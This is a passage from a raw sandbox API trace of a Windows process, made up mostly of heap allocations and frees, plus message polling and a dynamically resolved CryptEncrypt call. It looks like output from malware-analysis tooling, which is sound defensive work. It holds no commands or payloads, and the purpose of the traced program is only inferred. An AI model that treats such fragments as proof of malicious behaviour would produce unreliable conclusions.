hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.878] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0190.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0190.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.880] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0190.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0190.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1698 [0190.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0190.882] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.883] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0190.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.883] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0190.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.883] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.884] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.887] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0190.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a9f78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.889] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01c0 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0190.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0190.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0190.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.890] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1738*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1738*, pdwDataLen=0x8bef68*=0x8) returned 1 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0190.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0190.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0190.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.890] HeapFree (in: hHeap=0x25c0000, 